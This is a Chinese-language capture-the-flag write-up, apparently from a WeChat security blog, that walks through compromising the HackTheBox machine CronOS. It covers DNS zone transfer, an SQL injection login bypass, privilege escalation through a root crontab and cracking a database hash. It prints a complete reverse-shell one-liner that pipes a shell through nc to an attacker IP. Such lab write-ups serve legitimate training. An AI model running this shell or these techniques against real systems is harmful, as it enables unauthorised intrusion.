本文由 简悦 SimpRead 转码， 原文地址 mp.weixin.qq.com

一个每日分享渗透小技巧的公众号

大家好，这里是 大余安全 的第 98 篇文章，本公众号会每日分享攻防渗透技术给大家。

靶机地址：https://www.hackthebox.eu/home/machines/profile/11

靶机难度：初级（4.5/10）

靶机发布日期：2017 年 10 月 13 日

靶机描述：

CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability.

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.13....

Nmap 发现了一个 OpenSSH 服务器，一个 DNS 服务器和一个 Apache 服务器...

这里应该是存在子域名信息...

尽管必须猜测初始域名 cronos.htb，可以通过进行区域传输来枚举其余的子域，将 cronos.htb 添加到 / etc/hosts 文件后，使用 dig 发现了 admin.... 域名... 继续添加即可...

通过获得的子域名，添加到 hosts 后，访问是登陆页面...

通过测试... 存在 sql 注入... 简单的注入登陆进来了... 是一个 cmd 类似的命令框架... 这就直接提权即可...

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.51 4444 >/tmp/f

直接一句话提权输入... 获得了低权 shell，成功获得 user 信息...

利用 https://github.com/rebootuser/LinEnum 工具上传枚举 linux 服务器所有信息...

通过集体枚举，查看到 crontab 每分钟以 root 身份执行 / var/www/laravel/artisan... 并且进入查看后具有写入等功能...

这里我直接利用 kali 自导的 shell 覆盖提权.. 成功获得了 root 信息...（常规操作）

或者还可以 echo 写入 shell 命令，等等方式提权，随便怎么弄...

当然还可以在 / var/www/admin/config 里头查看到 mysql 账号密码... 通过访问数据库获得 admin 的哈希密码... 爆破即可... 需要时间....

由于我们已经成功得到 root 权限查看 user 和 root.txt，因此完成这台简单的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。

如果觉得这篇文章对你有帮助，可以转发到朋友圈，谢谢小伙伴~

随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~

欢迎加入渗透学习交流群，想入群的小伙伴们加我微信，共同进步共同成长！

大余安全

一个全栈渗透小技巧的公众号